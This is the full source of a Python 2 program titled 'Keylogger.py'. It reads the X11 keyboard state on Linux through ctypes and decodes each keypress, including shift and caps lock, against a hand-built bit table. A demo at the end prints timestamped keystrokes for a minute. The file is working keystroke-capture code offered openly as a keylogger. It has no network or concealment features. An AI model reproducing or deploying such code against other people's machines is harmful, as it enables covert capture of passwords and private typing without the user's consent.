Keylogger.py

1. import sys
2. from time import sleep, time
3. import ctypes as ct
4. from ctypes.util import find_library
5.  
6.  
7. # linux only!
8. assert("linux" in sys.platform)
9.  
10.  
11. x11 = ct.cdll.LoadLibrary(find_library("X11"))
12. display = x11.XOpenDisplay(None)
13.  
14.  
15. # this will hold the keyboard state.  32 bytes, with each
16. # bit representing the state for a single key.
17. keyboard = (ct.c_char * 32)()
18.  
19. # these are the locations (byte, byte value) of special
20. # keys to watch
21. shift_keys = ((6,4), (7,64))
22. modifiers = {
23.     "left shift": (6,4),
24.     "right shift": (7,64),
25.     "left ctrl": (4,32),
26.     "right ctrl": (13,2),
27.     "left alt": (8,1),
28.     "right alt": (13,16)
29. }
30. last_pressed = set()
31. last_pressed_adjusted = set()
32. last_modifier_state = {}
33. caps_lock_state = 0
34.  
35. # key is byte number, value is a dictionary whose
36. # keys are values for that byte, and values are the
37. # keys corresponding to those byte values
38. key_mapping = {
39.     1: {
40.         0b00000010: "<esc>",
41.         0b00000100: ("1", "!"),
42.         0b00001000: ("2", "@"),
43.         0b00010000: ("3", "#"),
44.         0b00100000: ("4", "$"),
45.         0b01000000: ("5", "%"),
46.         0b10000000: ("6", "^"),
47.     },
48.     2: {
49.         0b00000001: ("7", "&"),
50.         0b00000010: ("8", "*"),
51.         0b00000100: ("9", "("),
52.         0b00001000: ("0", ")"),
53.         0b00010000: ("-", "_"),
54.         0b00100000: ("=", "+"),
55.         0b01000000: "<backspace>",
56.         0b10000000: "<tab>",
57.     },
58.     3: {
59.         0b00000001: ("q", "Q"),
60.         0b00000010: ("w", "W"),
61.         0b00000100: ("e", "E"),
62.         0b00001000: ("r", "R"),
63.         0b00010000: ("t", "T"),
64.         0b00100000: ("y", "Y"),
65.         0b01000000: ("u", "U"),
66.         0b10000000: ("i", "I"),
67.     },
68.     4: {
69.         0b00000001: ("o", "O"),
70.         0b00000010: ("p", "P"),
71.         0b00000100: ("[", "{"),
72.         0b00001000: ("]", "}"),
73.         0b00010000: "<enter>",
74.         #0b00100000: "<left ctrl>",
75.         0b01000000: ("a", "A"),
76.         0b10000000: ("s", "S"),
77.     },
78.     5: {
79.         0b00000001: ("d", "D"),
80.         0b00000010: ("f", "F"),
81.         0b00000100: ("g", "G"),
82.         0b00001000: ("h", "H"),
83.         0b00010000: ("j", "J"),
84.         0b00100000: ("k", "K"),
85.         0b01000000: ("l", "L"),
86.         0b10000000: (";", ":"),
87.     },
88.     6: {
89.         0b00000001: ("'", "\""),
90.         0b00000010: ("`", "~"),
91.         #0b00000100: "<left shift>",
92.         0b00001000: ("\\", "|"),
93.         0b00010000: ("z", "Z"),
94.         0b00100000: ("x", "X"),
95.         0b01000000: ("c", "C"),
96.         0b10000000: ("v", "V"),
97.     },
98.     7: {
99.         0b00000001: ("b", "B"),
100.         0b00000010: ("n", "N"),
101.         0b00000100: ("m", "M"),
102.         0b00001000: (",", "<"),
103.         0b00010000: (".", ">"),
104.         0b00100000: ("/", "?"),
105.         #0b01000000: "<right shift>",
106.     },
107.     8: {
108.         #0b00000001: "<left alt>",
109.         0b00000010: " ",
110.         0b00000100: "<caps lock>",
111.     },
112.     13: {
113.         #0b00000010: "<right ctrl>",
114.         #0b00010000: "<right alt>",
115.     },
116. }
117.  
118.  
119.  
120.  
121. def fetch_keys_raw():
122.     x11.XQueryKeymap(display, keyboard)
123.     return keyboard
124.  
125.  
126.  
127. def fetch_keys():
128.     global caps_lock_state, last_pressed, last_pressed_adjusted, last_modifier_state
129.     keypresses_raw = fetch_keys_raw()
130.  
131.  
132.     # check modifier states (ctrl, alt, shift keys)
133.     modifier_state = {}
134.     for mod, (i, byte) in modifiers.iteritems():
135.         modifier_state[mod] = bool(ord(keypresses_raw[i]) & byte)
136.    
137.     # shift pressed?
138.     shift = 0
139.     for i, byte in shift_keys:
140.         if ord(keypresses_raw[i]) & byte:
141.             shift = 1
142.             break
143.  
144.     # caps lock state
145.     if ord(keypresses_raw[8]) & 4: caps_lock_state = int(not caps_lock_state)
146.  
147.  
148.     # aggregate the pressed keys
149.     pressed = []
150.     for i, k in enumerate(keypresses_raw):
151.         o = ord(k)
152.         if o:
153.             for byte,key in key_mapping.get(i, {}).iteritems():
154.                 if byte & o:
155.                     if isinstance(key, tuple): key = key[shift or caps_lock_state]
156.                     pressed.append(key)
157.  
158.    
159.     tmp = pressed
160.     pressed = list(set(pressed).difference(last_pressed))
161.     state_changed = tmp != last_pressed and (pressed or last_pressed_adjusted)
162.     last_pressed = tmp
163.     last_pressed_adjusted = pressed
164.  
165.     if pressed: pressed = pressed[0]
166.     else: pressed = None
167.  
168.  
169.     state_changed = last_modifier_state and (state_changed or modifier_state != last_modifier_state)
170.     last_modifier_state = modifier_state
171.  
172.     return state_changed, modifier_state, pressed
173.  
174.  
175.  
176.  
177. def log(done, callback, sleep_interval=.005):
178.     while not done():
179.         sleep(sleep_interval)
180.         changed, modifiers, keys = fetch_keys()
181.         if changed: callback(time(), modifiers, keys)
182.  
183.  
184.  
185.  
186. if __name__ == "__main__":
187.     now = time()
188.     done = lambda: time() > now + 60
189.     def print_keys(t, modifiers, keys): print "%.2f   %r   %r" % (t, keys, modifiers)
190.  
191.     log(done, print_keys)